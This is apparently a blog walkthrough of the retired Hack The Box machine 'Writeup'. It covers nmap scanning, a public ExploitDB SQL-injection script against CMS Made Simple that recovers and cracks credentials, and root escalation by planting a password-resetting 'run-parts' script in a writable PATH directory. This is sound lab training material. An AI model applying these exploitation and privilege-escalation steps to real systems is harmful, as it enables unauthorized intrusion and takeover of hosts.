Today, we're
sharing another Hack Challenge Walkthrough box: Writeup and the machine is part
of the retired lab, so you can connect to the machine using your HTB VPN and
then start to solve the CTF.
The level of
the Lab is set : Beginner to intermediate.
Task:
Capture the user.txt and root.txt flags.
Pentesting
Methodology
Network scanning
·
Nmap
Enumeration
·
Web Source code
Exploit
·
Unauthenticated Sql injection
Privilege Escalation
·
PATH Environment
Network Scanning
As we know the victim’s machine IP thus,
we can start with nmap scanning to identify the open ports and services running
across it.
nmap -A
10.10.10.138
From this
scanning result, we found that port 80 is open where the /writeup/ entry in the
robot.txt has been shown. Besides, port 22 is also open for ssh.
Enumeration
As a result, we looked at the victim IP in
the web browser and welcomed a web page show in the image below.
Then we explore the URL below to examine
/writeup as enumerated above.
It was a simple web page where we didn't
find any remarkable clue, so we were thinking about checking the source code of
the page.
Well, thankfully! We found the description
of the CMS used to build the website from inside the source code.
Without any delay, we have googled for CMS
Made Simple-2019 Exploit and fortunately found the Exploit db link to exploit
the SQL Injection vulnerability.
Exploit
We just downloaded the python script from
the ExploitDB and gave
ALL permission. When things are set, we run the following command to obtain the
credential from inside the database by exploiting unauthorized sql injection.
python 46635.py -u
http://10.10.10.138/writeup/ --crack -w /usr/share/wordlists/rockyou.txt
As result we found salt value, username,
email address, password hashes and its password.
Since we have found the login credential,
we can use it to access the ssh shell.
ssh jkr@10.10.10.138
Booom!! We successfully got the host
machine shell and found the user.txt file as shown in the below image. Now it
was time to obtain the higher privilege shell by escalating the privilege of
the user jkr.
Privilege Escalation
It was time to post enumeration to
determine the concealed process running on the host machine. We try to
enumerate the services running as root that can be abused, and to do this, we
have to use pspy64 to
identify the services running, because the manual approach failed to identify
all processes running in the background.
Therefore, we downloaded the pspy64
script in the host machine inside /tmp directory and assign full permissions then
ran it to identify processes running of the machine.
cd /tmp
chmod 777
./pspy64
So, we found that a suspicious process was
underway, which was executing the following command:
sh -c /usr/bin/env -i
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts
--lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
We're trying to break down in order to
analyze what's going on in the current phase.
sh -c /usr/bin/env -i
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Here we saw “sh -c /usr/bin/env” command
was running to create an empty environment to setting up the PATH variable in
which you can observe that “/usr/local/sbin” was at top which means it will be
given highest priority.
run-parts --lsbsysinit
/etc/update-motd.d > /run/motd.dynamic.new
All the scripts in /etc/update-motd.d using
run-parts, then stores all output in /run/motd.dynamic.new
Interestingly, we found that the above
command was running when jkr connects to ssh to access the server, so we can
assume that every time we connect to ssh as jkr, the script will run with the
help of the command.
Thus we check the permissions for /usr/local/sbin
and notethe ownership as root:staff, then we checked for user_id and luckily find
that jkr is the member of staff group.
Since /usr/local/sbin is being set as the
priority path, hence we can try to write a malicious file inside the
/usr/local/sbin/ with a name as run-parts.
So, in our local machine we write a script,
to change the password for user root and save it as run-parts,
Then transfer this file on the host machine
using HTTP python server.
#!/bin/bash
echo
"root:raj@123"|chpasswd
python -m SimpleHTTPServer
Let's download the malicious script to
the host machine inside the /tmp directory and give it full permission to copy
it to “/usr /local/sbin” as shown in the image below.
cd /tmp
chmod 777 run-parts
cp run-parts /usr/local/sbin
when everything is done then we need to
logout and then again login with ssh as jkr so that our malicious script gets
execute as said above.
ssh jkr@10.10.10.138
su root
cd /root
cat root.txt
Booom! Booom! We've got the root flag, as
soon as you connect to ssh again, the running process will run our malicious
run-part script, which will modify the root user password, and then you can switch
the user as root and catch the root.txt flag.
0 comments:
Post a Comment